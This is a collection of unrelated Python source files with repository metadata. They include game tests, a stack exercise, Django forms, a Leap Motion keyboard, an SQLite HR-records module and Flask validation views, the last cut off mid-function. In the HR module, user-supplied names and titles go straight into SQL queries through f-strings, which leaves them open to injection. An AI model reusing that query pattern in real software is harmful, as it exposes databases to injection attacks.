ttt=TicTakToe()
pop = set('a')
self.assertTrue( ttt.is_valid_population(pop) )
def test_is_validPopulation_len_ok_character_not_ok(self):
ttt = TicTakToe()
pop = set(ttt.init_char)
self.assertFalse( ttt.is_valid_population(pop) )
def test_winning_row_set(self):
board = [[' ', ' ', ' '],
[' ', ' ', ' '],
[' ', ' ', ' ']]
expected = []
self.assertEqual(expected, TicTakToe().winning_row_set(board))
def test_winning_row_set_empty(self):
board = [['X', 'X', 'X'],
[' ', 'X', 'O'],
[' ', 'X', 'O']]
expected = [RowPopulation(0, set({'X'}))]
self.assertEqual(expected, TicTakToe().winning_row_set(board))
def test_winning_row_set_no_result(self):
board = [[' ', 'X', 'O'],
[' ', 'X', 'O'],
[' ', 'X', 'O']]
expected = []
self.assertEqual( expected, TicTakToe().winning_row_set(board) )
def test_winning_col_set(self):
board = [[' ', ' ', ' '],
[' ', ' ', ' '],
[' ', ' ', ' ']]
expected = []
self.assertEqual(expected, TicTakToe().winning_col_set(board))
def test_winning_col_set_empty(self):
board = [['X', 'X', 'X'],
[' ', 'X', 'O'],
[' ', 'X', 'O']]
expected = [ColPopulation(1, set('X'))]
self.assertEqual(expected, TicTakToe().winning_col_set(board))
def test_winning_col_set_no_result(self):
board = [[' ', 'X', 'O'],
['X', ' ', 'X'],
['O', 'O', ' ']]
expected = []
self.assertEqual( expected, TicTakToe().winning_col_set(board) )
if __name__ == '__main__':
unittest.main()
|
[
"basilbibi@hotmail.com"
] |
basilbibi@hotmail.com
|
0304c5bfcd97ee77e26583fa65be39ff4d649d93
|
742c8ac2b1e5283b8a9a073b2bf01407c7a07e6d
|
/Lesson_8.py
|
8ed30c165856d8885c5cfa040510ba80fa5a58de
|
[] |
no_license
|
MORVf/Lessons_python_part2
|
993c24a2664e5e552f61a7dcc766700d16557abb
|
721292862254019dad95a28e2a0a2765d711d4fb
|
refs/heads/main
| 2023-03-07T15:50:05.288100
| 2021-02-24T17:23:05
| 2021-02-24T17:23:05
| 318,802,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,123
|
py
|
'''
Реализуйте структуру данных, представляющую собой расширенную структуру стек. Необходимо поддерживать добавление элемента
на вершину стека, удаление с вершины стека, и необходимо поддерживать операции сложения, вычитания, умножения и целочисленного деления.
Операция сложения на стеке определяется следующим образом. Со стека снимается верхний элемент (top1), затем снимается следующий верхний
элемент (top2), и затем как результат операции сложения на вершину стека кладется элемент, равный top1 + top2.
Аналогичным образом определяются операции вычитания (top1 - top2), умножения (top1 * top2) и целочисленного деления (top1 // top2).
Реализуйте эту структуру данных как класс ExtendedStack, отнаследовав его от стандартного класса list.
Для добавления элемента на стек используется метод append, а для снятия со стека – метод pop.
Гарантируется, что операции будут совершаться только когда в стеке есть хотя бы два элемента.
'''
class ExtendedStack(list):
def my_sum(self):
self.append(self.pop() + self.pop())
def sub(self):
self.append(self.pop() - self.pop())
def mul(self):
self.append(self.pop() * self.pop())
def div(self):
self.append(self.pop() // self.pop())
'''
тесты
X = ExtendedStack([1, 2, 3, 4, -3, 3, 5, 10])
print(X)
X.my_sum()
print(X)
X.sub()
print(X)
X.mul()
print(X)
X.div()
print(X)
X.append(20)
print(X)
X.pop()
print(X)
'''
|
[
"noreply@github.com"
] |
MORVf.noreply@github.com
|
732f3c012d3c55f5169589f6bf9402b43988c1e0
|
735571ceed8be69d4b182561ba597fa5ff66c10e
|
/Par. 1/codes/eSquared.py
|
dd2321784c602aea5da9f04db935ac8fc67f127e
|
[] |
no_license
|
Kaladin12/numerical_methods_winterTerm_2020
|
1dd7a355a2cb0ce01c7c783cf29664863d355670
|
7685aa5f0db7218bb95b91b94a7e100bbb3e7d40
|
refs/heads/master
| 2023-02-17T22:26:10.896907
| 2021-01-20T04:35:34
| 2021-01-20T04:35:34
| 304,725,568
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
import math
x = 1
n = 1000
S = 0
for k in range(n):
S += ((2*x)**(k))/(math.factorial(k))
print('Valor real: ', (math.e)**2)
print('Itearciones :', n)
print('Aprocimación: ', S, 'con un error de ', (math.e)**2 - S)
|
[
"eliancruz998@gmail.com"
] |
eliancruz998@gmail.com
|
eac348a53210fd8d9c0982f727958bca046b69ca
|
b1b7e9427874de5d7b1f949a85d7fa047b160433
|
/jobApp/form.py
|
46005a5ab61d519b1e44e86436a063b8d9049c2b
|
[] |
no_license
|
sirox548/ICIMS_JOBAPP
|
0d6d1d425585aa3799bcbb9c8eede5a61b66fa8e
|
b1a7d2915c6d5f76f1e722b68498959b5f005a72
|
refs/heads/main
| 2023-02-22T13:44:32.552325
| 2021-01-24T16:11:58
| 2021-01-24T16:11:58
| 326,033,122
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
from django.forms import ModelForm
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
from .models import Employer, Candidate
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ['first_name', 'last_name', 'username', 'email', 'password1', 'password2']
class EmployerForm(forms.ModelForm):
class Meta:
model = Employer
fields = '__all__'
exclude = ['candidate']
class ResumeUpload(forms.Form):
title = forms.CharField(max_length=50)
resume = forms.FileField()
class CandidateForm(forms.ModelForm):
class Meta:
model = Candidate
fields = '__all__'
exclude = ['user']
|
[
"55093250+sirox548@users.noreply.github.com"
] |
55093250+sirox548@users.noreply.github.com
|
4165bc48b340d4d2f4bc37bbefc8be9e8c6c2c7e
|
4c1084cbad23aab949ad733dc0f686ec0e62a37d
|
/MotionStuff/keyboard.py
|
75aa956d084d90a5868a08ec9ee5cdf4a9af23a9
|
[] |
no_license
|
avarchy/Leap-Motion-Experiments
|
1c31675f0640429a268d50a580bb47e11a72fc35
|
869b7e68d4b3e77dc26508ed4226745bc3bbb86c
|
refs/heads/master
| 2016-09-05T11:21:30.368073
| 2015-01-10T00:03:21
| 2015-01-10T00:03:21
| 26,896,309
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,153
|
py
|
# Adithya Venkatesan
#
# keyboard
# need to work on getting key presses to work
#
from Tkinter import *
from sys import exit
import math
import Leap, sys
from Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture
w,h= 975,400
x,y,dx,dy=100,100,199,199
fingdisplist = []
scaling = 3.0
def quit(evnt):
exit(0)
class SampleListener(Leap.Listener):
def on_init(self, controller):
print "Initialized"
def on_connect(self, controller):
print "Connected"
# Enable gestures
controller.enable_gesture(Leap.Gesture.TYPE_CIRCLE);
controller.enable_gesture(Leap.Gesture.TYPE_KEY_TAP);
controller.enable_gesture(Leap.Gesture.TYPE_SCREEN_TAP);
controller.enable_gesture(Leap.Gesture.TYPE_SWIPE);
def on_disconnect(self, controller):
# Note: not dispatched when running in a debugger.
print "Disconnected"
def on_exit(self, controller):
print "Exited"
def on_frame(self, controller):
# Get the most recent frame and report some basic information
global fingdisplist
for finger in fingdisplist:
canvas.delete(finger)
fingdisplist = []
frame = controller.frame()
##print "Frame id: %d, timestamp: %d, hands: %d, fingers: %d, tools: %d, gestures: %d" % (
## frame.id, frame.timestamp, len(frame.hands), len(frame.fingers), len(frame.tools), len(frame.gestures()))
if not frame.hands.is_empty:
# Get the first hand
for hand in frame.hands:
# Check if the hand has any fingers
fingers = hand.fingers
if not fingers.is_empty:
# Calculate the hand's average finger tip position
avg_pos = Leap.Vector()
for finger in fingers:
fingdisplist.append(canvas.create_oval( w/2+scaling*(finger.tip_position[0]), h/2+scaling*(finger.tip_position[2]) , w/2+scaling*(finger.tip_position[0])+circlediameter , h/2+scaling*(finger.tip_position[2])+circlediameter,fill='blue',outline=''))
#fingdisplist.append(a)
##avg_pos += finger.tip_position
##avg_pos /= len(fingers)
#canvas.delete(a)
#print "Hand has %d fingers, finger drawn: %s" % (len(fingers), finger.tip_position)
#use find_overlapping(x1,y1,x2,y2) to find rectangle that it is inside
#use a bounding box that is tall enough that it goes a little past the height of a key
#then check each of the tuples for left <= x <= right, top <= y <= bottom
#if any satisfy, it is hitting that key => set the key a different shade for a sec and register the letters
for gesture in frame.gestures():
if gesture.type == Leap.Gesture.TYPE_KEY_TAP:
keytap = KeyTapGesture(gesture)
#print "Key Tap Position: %s, direction %s" % (keytap.position, keytap.direction)
xtap=int(w/2+scaling*(keytap.position[0]))
ytap=int(h/2+scaling*(keytap.position[2]))
overlapkeys = canvas.find_overlapping(xtap-1,ytap-(key_height/2+1),xtap+1,ytap+(key_height/2+1))
#print len(overlapkeys)
for posskey in overlapkeys:
tempcoords = canvas.coords(posskey)
if len(tempcoords)<4:
print tempcoords
if tempcoords[0] < xtap and xtap < tempcoords[2] and tempcoords[1] < ytap and ytap < tempcoords[3]:
if canvas.type(posskey)=="rectangle":
pressedkey = canvas.gettags(posskey)[0]
print pressedkey
#various key functions
if pressedkey=='Backspace':
typed.delete(len(typed.get())-1,END)
elif pressedkey=='space':
typed.insert(END,' ')
elif pressedkey=='Enter':
typed.insert(END,'\n')
elif pressedkey=='Shift':
shiftnextkey=True
else:
typed.insert(END,canvas.gettags(posskey)[0])
elif gesture.type == Leap.Gesture.TYPE_CIRCLE:
circle = CircleGesture(gesture)
#determines which direction you are circling
if circle.pointable.direction.angle_to(circle.normal) <= Leap.PI/4:
clockwiseness = "clockwise"
else:
clockwiseness = "counterclockwise"
#circle
previous_update = CircleGesture(controller.frame(1).gesture(circle.id))
swept_angle = (circle.progress - previous_update.progress) * 2 * Leap.PI
if swept_angle > 3:
print 'circles!'
#
#Start of stuff
#
root=Tk()
canvas=Canvas(root,width=w,height=h,bg='white')
canvas.pack()
#
# Graphics objects.
#
key_width = 70
key_height = 60
circlediameter = 20
keyspacing = 4
btn_list = [
['`','1','2','3','4','5','6','7','8','9','0','-','='],
['*20','q','w','e','r','t','y','u','i','o','p','Backspace'],
['*40','a','s','d','f','g','h','j','k','l',';','\'','Enter'],
['Shift','z','x','c','v','b','n','m',',','.','/','Shift'],
['*200','space']]
typed = Entry(root, bd =5, width=30)
typed.pack()
typed.place(relx=.45,rely=.9)
#option to copy text in the program
#just add button to get this to work, probably need a click event
#root.withdraw()
#root.clipboard_clear()
#root.clipboard_append(typed.get())
#root.destroy()
ycorner=10
for r in btn_list:
xcorner=10
for c in r:
if c[0]=='*' and not len(c)==1:
xcorner+= int(''.join(map(str,c[1:])))#one liner to convert list to num
#specifies spacing used
#elif c[0]=='+' and not len[c]==1:
elif c == 'space':
rect=canvas.create_rectangle(xcorner,ycorner,xcorner+7*key_width,ycorner+key_height,fill='gray',outline='black',tags="space")
objt=canvas.create_text((7*key_width+2*xcorner)/2,(key_height+2*ycorner)/2,text=c,fill='white')
xcorner+=keyspacing+key_width
else:
rect=canvas.create_rectangle(xcorner,ycorner,xcorner+key_width,ycorner+key_height,fill='gray',outline='black',tags=c)
objt=canvas.create_text((key_width+2*xcorner)/2,(key_height+2*ycorner)/2,text=c,fill='white')
xcorner+=keyspacing+key_width
ycorner+=keyspacing+key_height
listener = SampleListener()
controller = Leap.Controller()
# Have the sample listener receive events from the controller
controller.add_listener(listener)
# Gestures
#
# Callbacks.
#
##root.bind('<Down>',down)
##root.bind('<Up>',up)
##root.bind('<Right>',right)
##root.bind('<Left>',left)
root.bind('<q>',quit)
#
# Here we go.
#
root.mainloop()
|
[
"avarchy@gmail.com"
] |
avarchy@gmail.com
|
0f5ac101c37ad80b6a39382e13fbe8f1b43422d3
|
2332aa3eddd8b0acada5197b98afa5068a653dfd
|
/test/utils/test_crud.py
|
5bea2484670a32d7a996610eddeab43f8bb3c021
|
[] |
no_license
|
Rottab/currency-converter-cli
|
a60b92d7cd9a355db0630c8cf56d1414c9e0638b
|
2391f58da9e134c583faef49c94ac492bfef4095
|
refs/heads/main
| 2022-12-24T06:36:45.603672
| 2020-10-04T10:00:20
| 2020-10-04T10:00:20
| 300,434,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
from currency_converter_cli.utils.crud import *
import pytest
def test_rates_from_json():
pass
|
[
"mr.rottab@gmail.com"
] |
mr.rottab@gmail.com
|
1cd730dbcf05a7be95382c869bcd5b92c37a75b1
|
ab6a40ac8e136a9ee2cbf214bc29f864507f42ad
|
/BIOAuthMedicare/util.py
|
595d5f2c6b8d1c12d672227521acf1d7147e0e37
|
[] |
no_license
|
SnehitReddy/BIOAuthMedicare
|
d6ecf069ce843d657d8c1705c00d0e86decd73fd
|
4b96caa1403aad291dfb48fb62129aaee358017e
|
refs/heads/master
| 2022-12-02T06:38:03.338205
| 2020-03-19T12:07:33
| 2020-03-19T12:07:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
import hashlib
import pickle
import numpy
import reedsolo
from memory_profiler import profile
rsc = reedsolo.RSCodec(12)
def load(file):
try:
fin = open(file, "rb")
return pickle.load(fin)
except FileNotFoundError:
return []
def store(obj, file):
fout = open(file, "wb")
pickle.dump(obj, fout)
def encode(k):
return int(rsc.encode(k).hex(), 16)
# @profile
def decode(kcw):
try:
return rsc.decode(kcw.to_bytes(50, 'big')).decode("utf-8").lstrip('\x00')
except reedsolo.ReedSolomonError:
return ""
except OverflowError:
return ""
# @profile
def compute_one_way_hash(x):
return int(hashlib.sha256(x.encode('utf-8')).hexdigest(), 16)
def load_biometric(file_name):
return numpy.loadtxt(file_name)
|
[
"30975835+Chirag3345@users.noreply.github.com"
] |
30975835+Chirag3345@users.noreply.github.com
|
dff24bd2b7e3f74e2b44425b4fa1060f68b2f312
|
ea5d18e78ef9fffca5edc27959c348d3534093c2
|
/db.py
|
67898f21f3456fcdd2301578754477c2c16d87b4
|
[] |
no_license
|
Letaldiran/Human-Resources-Department-App
|
27d8f53f01ae15e7759c91e587c53e519defa8e0
|
41f6dbee6b9dc70c0cdfc6d314618a897131ce13
|
refs/heads/main
| 2023-05-29T11:33:18.079038
| 2021-06-17T09:32:58
| 2021-06-17T09:32:58
| 377,773,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,620
|
py
|
import sqlite3
import datetime
def initialize_tables(cur):
conn = cur.cursor()
try:
conn.execute('''
DROP TABLE WORKERS;
''')
except:
pass
try:
conn.execute('''
DROP TABLE SUBDIVISIONS;
''')
except:
pass
try:
conn.execute('''
DROP TABLE ORDERS;
''')
except:
pass
conn.execute('''
CREATE TABLE WORKERS(
ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
FULLNAME TEXT NOT NULL,
POSITION TEXT NOT NULL,
SUBDIVISION TEXT NOT NULL,
SALARY INT NOT NULL
);
''')
conn.execute('''
CREATE TABLE SUBDIVISIONS(
ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
TITLE TEXT NOT NULL,
POSITIONS TEXT NOT NULL,
UNITSIZE INT NOT NULL
);
''')
conn.execute('''
CREATE TABLE ORDERS(
ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
TITLE TEXT NOT NULL,
TYPE TEXT NOT NULL,
TEXT TEXT NOT NULL,
DATE DATE NOT NULL
);
''')
conn.execute('''
INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (1,'Smirnov Alexander','Engineer','Technical Department',18680);
''')
conn.execute('''
INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (2,'Gotie Alan','Team-Lead','Development Department',23120);
''')
conn.execute('''
INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (3,'Meril Andrea','Marketer','Sales Department',13660);
''')
conn.execute('''
INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (4,'Anderson Paul','Web-developer','Development Department',15500);
''')
conn.execute('''
INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (5,'Leclerk Anna','Consultant','Sales Department',10700);
''')
conn.execute('''
INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (6,'Sobraj Charles','Accountant','Sales Department',16900);
''')
conn.execute('''
INSERT INTO SUBDIVISIONS (ID,TITLE,POSITIONS,UNITSIZE) VALUES (1,'Technical Department','Tech. Assistant, Technician, Engineer',20);
''')
conn.execute('''
INSERT INTO SUBDIVISIONS (ID,TITLE,POSITIONS,UNITSIZE) VALUES (2,'Development Department','Web-developer, Team-Lead, DevOps',35);
''')
conn.execute('''
INSERT INTO SUBDIVISIONS (ID,TITLE,POSITIONS,UNITSIZE) VALUES (3,'Sales Department','Marketer, Consultant, Accountant',55);
''')
conn.execute('''
INSERT INTO ORDERS (ID,TITLE,TYPE,TEXT,DATE) VALUES (1,'Transfer order', 'Transfer', 'Alan Gotie is transfered to Development Department as Team-Lead for good and qualitative work', '2021/04/09');
''')
conn.execute('''
INSERT INTO ORDERS (ID,TITLE,TYPE,TEXT,DATE) VALUES (2,'Dismissal order', 'Dismissal', 'Sahar Musal is fired for his bad attitude and non-proffesionalism', '2020/06/21');
''')
conn.execute('''
INSERT INTO ORDERS (ID,TITLE,TYPE,TEXT,DATE) VALUES (3,'Hiring order', 'Hiring','Charles Sobraj is hired for us to perform work', '2021/05/19');
''')
cur.commit()
class DB():
def get_orders(self, conn):
result = []
for line in conn.execute('''
SELECT ID,TITLE,TYPE,TEXT,DATE FROM ORDERS;
'''):
result.append(line)
return result
def get_order(self, conn, ids):
result = []
for line in conn.execute(f'''
SELECT ID,TITLE,TYPE,TEXT,DATE FROM ORDERS WHERE ID={ids};
'''):
result.append(line)
return result
def get_all_workers(self, conn):
result = []
for line in conn.execute('''
SELECT FULLNAME,POSITION,SUBDIVISION,SALARY FROM WORKERS;
'''):
result.append(line)
return result
def get_all_subdivisions(self, conn):
result = []
for line in conn.execute('''
SELECT TITLE,POSITIONS,UNITSIZE FROM SUBDIVISIONS;
'''):
result.append(line)
return result
def get_subdivision_by_name(self, conn, subdivision):
result = []
for line in conn.execute(f'''
SELECT TITLE,POSITIONS,UNITSIZE FROM SUBDIVISIONS WHERE TITLE='{subdivision}';
'''):
result.append(line)
return result
def get_subdivision_positions(self, conn, title):
result = []
for line in conn.execute(f'''
SELECT POSITIONS FROM SUBDIVISIONS WHERE TITLE='{title}';
'''):
result.append(line)
return result
def get_worker_by_name(self, conn, fullname):
return conn.execute(f'''
SELECT FULLNAME,POSITION,SUBDIVISION,SALARY FROM WORKERS WHERE FULLNAME='{fullname}';
''')
def get_workers_by_department(self, conn, subdivision):
result = []
for line in conn.execute(f'''
SELECT FULLNAME,POSITION,SUBDIVISION,SALARY FROM WORKERS WHERE SUBDIVISION='{subdivision}';
'''):
result.append(line)
return result
def remove_subdivision_and_people(self, conn, subdivision):
date = datetime.datetime.now().strftime('%Y\%m\%d')
for person in self.get_workers_by_department(conn, subdivision):
self.add_order(conn, 'Dismissal order', 'Dismissal', person[0] + ' was dismissed', date)
conn.execute(f'''
DELETE FROM WORKERS WHERE SUBDIVISION='{subdivision}';
''')
conn.execute(f'''
DELETE FROM SUBDIVISIONS WHERE TITLE='{subdivision}';
''')
def remove_worker(self, conn, fullname):
conn.execute(f'''
DELETE FROM WORKERS WHERE FULLNAME='{fullname}';
''')
def update_worker(self, conn, fullname, newname, newposition, subdivision, salary):
conn.execute(f'''
UPDATE WORKERS SET FULLNAME='{newname}', POSITION='{newposition}', SUBDIVISION='{subdivision}', SALARY={salary} WHERE FULLNAME = '{fullname}';
''')
def update_subdivisions(self, conn, subdivision, newsubdivisiontitle, newpositions, newunitsize):
date = datetime.datetime.now().strftime('%Y\%m\%d')
conn.execute('''
UPDATE SUBDIVISIONS SET TITLE=?, POSITIONS=?, UNITSIZE=? WHERE TITLE=?;
''', (newsubdivisiontitle, newpositions, newunitsize, subdivision))
for person in self.get_workers_by_department(conn, subdivision):
self.add_order(conn, 'Transfer order', 'Transfer', person[0] + ' was transferred to ' + newsubdivisiontitle, date)
self.update_worker(conn, person[0], person[0], person[1], newsubdivisiontitle, person[3])
def add_worker(self, conn, fullname, position, subdivision, salary):
conn.execute(f'''
INSERT INTO WORKERS (FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES ('{fullname}','{position}','{subdivision}',{salary});
''')
def add_subdivision(self, conn, title, positions, unitsize):
conn.execute(f'''
INSERT INTO SUBDIVISIONS (TITLE,POSITIONS,UNITSIZE) VALUES ('{title}','{positions}',{unitsize});
''')
def add_order(self, conn, title, type, text, date):
conn.execute(f'''
INSERT INTO ORDERS (TITLE,TYPE,TEXT,DATE) VALUES ('{title}','{type}','{text}','{date}');
''')
def update_positions_of_workers_in_subdivision(self, conn, subdivision, newpositions):
date = datetime.datetime.now().strftime('%Y\%m\%d')
positions = self.get_subdivision_positions(conn, subdivision)[0][0]
print(positions)
print(newpositions)
if positions!=newpositions:
for old, new in zip(positions.split(', '), newpositions.split(', ')):
print(old)
print(new)
conn.execute(f'''
UPDATE WORKERS SET POSITION='{new}' WHERE POSITION = '{old}';
''')
self.add_order(conn, 'Positions changed', 'Swapping ', old + ' was changed to ' + new + ' in department ' + subdivision, date)
if __name__=='__main__':
initialize_tables(sqlite3.connect('database.db'))
|
[
"aaaa@gmail.com"
] |
aaaa@gmail.com
|
58572991de8aab3ba45ad300f82a833fe8aab483
|
16dba5fc0cdd15627eaf00ec489be2c3b3e09956
|
/page/web/base_page.py
|
1dab868d22a93b9182712313f1632fff7438a837
|
[] |
no_license
|
lucy1-22/omg_auto
|
894184bb5d97ad605f15eed0c4eee557fb43309e
|
4a1202eaa7c26a79e7ce234bcefad5166550dc01
|
refs/heads/master
| 2022-11-28T20:45:44.094615
| 2020-08-12T05:58:59
| 2020-08-12T05:58:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
# coding=utf-8
from selenium.webdriver.common.by import By
class BasePage:
next_button = (By.CSS_SELECTOR, 'input[value="Next"]')
sign_button = (By.CSS_SELECTOR, 'span[class="submit"]')
simple_button = (By.CSS_SELECTOR, 'span.fxs-button-text')
yes_button = (By.CSS_SELECTOR, 'input[value="Yes"]')
click_verify_button = (By.CSS_SELECTOR, 'a[class="actionLink"]')
click_signin_button = (By.CSS_SELECTOR, 'p[class="normalText"]')
header_title = (By.CSS_SELECTOR, 'header.fxs-home-title')
option = (By.CSS_SELECTOR, 'span.fxs-portal-svg')
wait_notifications = (By.CSS_SELECTOR, 'div.fxs-notificationspane-progressbar.fxs-display-none')
wait_loading = (By.CSS_SELECTOR, '.fxs-bladecontent-progress.fxs-portal-background.fxs-display-none')
topbar_sidebar = (By.CSS_SELECTOR, 'a.fxs-topbar-sidebar-collapse-button')
toolbar_container = (By.CSS_SELECTOR, 'ul.azc-toolbar-container.fxs-commandBar-itemList')
delete_button = (By.CSS_SELECTOR, 'li[title="Delete"]')
blade_title = (By.CSS_SELECTOR, 'div.fxs-blade-title-content')
progress_dots = (By.CSS_SELECTOR, 'fxs-progress-dots-dot')
baidu_input = (By.CSS_SELECTOR, 'input[class="s_ipt"]')
baudu_baike = (By.CSS_SELECTOR, 'a[target="_blank"]')
|
[
"v-avliu@microsoft.com"
] |
v-avliu@microsoft.com
|
30ecdf4611a27598b6fe6657a56fac8231062d53
|
1bc74aea75a10e87ae6e195691c99a98e54da395
|
/venv/bin/python/bin/flask
|
be6d6a39df565acc9c5a8f8f5113164c43993c34
|
[] |
no_license
|
omrozh/inads
|
e550a82c6677324e0c983808e8c76017d1bb5c5c
|
a3bcf78949852c359a814e83d102507d1b908de1
|
refs/heads/main
| 2023-06-10T12:59:49.147956
| 2021-07-08T11:31:54
| 2021-07-08T11:31:54
| 384,066,478
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
#!/Users/omerozhan/PycharmProjects/InAdsWeb/venv/bin/python/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"omrozh@hotmail.com"
] |
omrozh@hotmail.com
|
|
7d8c1cb9db1f31867436ae29567686b448acd023
|
ac7b02f4e7aa751ee24ed8933276990c801e1e64
|
/src/mapreduce/interpreter/python/reducer.py
|
010d238aa4e506c4ccec731f395d038c90905277
|
[] |
no_license
|
emilia-sokol/gae_interpreter
|
563ff02008229679933412ef7defe4f10f1bf02f
|
f1ba7feb46e6e072844859622b30e30a1cf0694a
|
refs/heads/master
| 2022-12-18T16:49:49.339302
| 2020-09-16T17:55:17
| 2020-09-16T17:55:17
| 260,986,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 537
|
py
|
from mapreduce import context
from google.appengine.ext import blobstore
def py_reducer_interpreter(key, values):
ctx = context.get()
file_blob_key = ctx.mapreduce_spec.mapper.params['output_writer']['reducer']
reader = blobstore.BlobReader(file_blob_key)
output = []
exec (reader.read(), {"key": key, "values": values, "output": output})
for out in output:
# @TODO store output somewhere and redirect to the source after
print(out)
yield "%s: %d\n" % (out[0], out[1])
|
[
"emilia.sokol94@gmail.com"
] |
emilia.sokol94@gmail.com
|
2f734a23bf67cd3cc91a9c971e8bfe20bac6a727
|
0ed22fdbc7716d7a6c6547a0c0b28184409f0ac5
|
/secTools/general_loader.py
|
a49f9f4b21a992a527d18bda817632bc5a5f1e36
|
[] |
no_license
|
yetiminer/dis
|
7dba9b4cba2ab21110e348c2464593b1b09904e0
|
0a781caf2de1d27e2e5109948225ca17ea40965c
|
refs/heads/master
| 2020-03-07T00:45:25.137774
| 2018-08-03T18:24:34
| 2018-08-03T18:24:34
| 127,165,246
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 994
|
py
|
from secTools import yamlLoad, load_from_db, streamline, load_from_pickle
from load_data1 import SecTable, SECdataset
from sqlalchemy import create_engine, MetaData
def ds_from_db(**kwargs):
if 'pickle_file' in kwargs:
pickle_file=kwargs['pickle_file']
ds=load_from_pickle(pickle_file)
elif 'reimport_db' in kwargs:
cfg=kwargs['cfg']
threshold=kwargs['tag_min_count_threshold']
normalise_cols=kwargs['normalise_cols']
reimport_db=kwargs['reimport_db']
db_location=kwargs['db_location']
engine=create_engine('sqlite:///'+db_location, echo=True)
data=load_from_db(engine)
data=streamline(data,cfg)
ds=SECdataset('ds',cfg,**data)
ds.tag_count_plot(inplace=True)
ds.feature_prune(thresh=threshold,inplace=True)
ds.tag=ds.tag_prune(ds.tag)
ds.pre=ds.tag_prune(ds.pre)
ds.num=ds.tag_prune(ds.num)
ds.create_feature_table(inplace=True)
ds.normalise(inplace=True,cols=normalise_cols)
return ds
|
[
"github@yetiminer.com"
] |
github@yetiminer.com
|
8b981edc4cd60588dc181c76b776ce8ad0575668
|
955d26b505e1997aeee308e2f27a45fcd30eea8b
|
/reverse.py
|
378bbae40af2892eeff0b59946063779fd46a03a
|
[] |
no_license
|
radzirazak/reverseString
|
9c0e3cdf37bb3dab799057311f2a2541cb9f3235
|
c130da817e3703fc2af3225636c5e6ff1f59dcfb
|
refs/heads/master
| 2021-01-17T17:39:36.794695
| 2017-06-27T06:44:51
| 2017-06-27T06:44:51
| 95,526,320
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 123
|
py
|
def reverseStr(string):
print ('Reverse: ' + string[::-1])
string = input('Enter anything: ')
reverseStr(string)
|
[
"noreply@github.com"
] |
radzirazak.noreply@github.com
|
19cfbbe5fcae30c1301b87cb5938c5e2c0a4f947
|
4a63c700f4e4159dd4089a8488d9c32dbefab471
|
/rgc/views/validation/views.py
|
50aa13bbc6dd86ec8c284e96f3b3c622804afd4c
|
[] |
no_license
|
kaikai136/remote-center
|
4d2072c27d34fda6cf46360a2ef53b7533025287
|
bd002acf7972a96d00f0615a883dca9313a75a5e
|
refs/heads/master
| 2022-09-26T05:22:38.683985
| 2019-09-01T12:17:58
| 2019-09-01T12:17:58
| 205,656,782
| 0
| 0
| null | 2022-09-16T18:09:23
| 2019-09-01T09:43:22
|
Python
|
UTF-8
|
Python
| false
| false
| 4,053
|
py
|
# -*- coding:utf8 -*-
# @Project : remote-center
# @Author : qxq
# @Time : 2019/7/2 9:50 AM
from flask import request, current_app
from rgc import PlatformInfo, AppInfo, CarInfo
from rgc.views.validation import validation_blue
@validation_blue.route("/platisonline/", methods=["POST"])
def plat_is_online():
ip = request.form.get('ip')
if not ip:
return '1'
try:
platform_obj = PlatformInfo.query.filter(PlatformInfo.platformIp == ip).all()
except Exception as e:
current_app.logger.error(e)
return '2'
if not platform_obj:
pass
else:
for platform in platform_obj:
if platform.online:
return '3'
return '4'
@validation_blue.route("/carisonline/", methods=["POST"])
def car_is_online():
ip = request.form.get('ip')
print(ip)
if not ip:
return '1'
try:
car_obj = CarInfo.query.filter(CarInfo.carIp == ip).all()
except Exception as e:
current_app.logger.error(e)
return '2'
if not car_obj:
pass
else:
for car in car_obj:
if car.online:
return '3'
return '4'
@validation_blue.route("/isonline/", methods=["POST"])
def is_online():
app_key = request.form.get('app_key')
if not app_key:
return '4'
try:
app_obj = AppInfo.query.filter(AppInfo.app_key == app_key).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not app_obj:
pass
else:
type = app_obj.type
id = app_obj.deviceId
if type == '1':
try:
car_obj = CarInfo.query.filter(CarInfo.carId == id).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not car_obj:
pass
else:
if car_obj.online:
return '3'
elif type == '2':
try:
plat_obj = PlatformInfo.query.filter(PlatformInfo.platformId == id).first()
except Exception as e:
current_app.logger.error(e)
return '2'
if not plat_obj:
pass
else:
if plat_obj.online:
return '3'
else:
return '2'
return '4'
@validation_blue.route("/platValidationKeySerect/", methods=["POST"])
def plat_validation_key_serect():
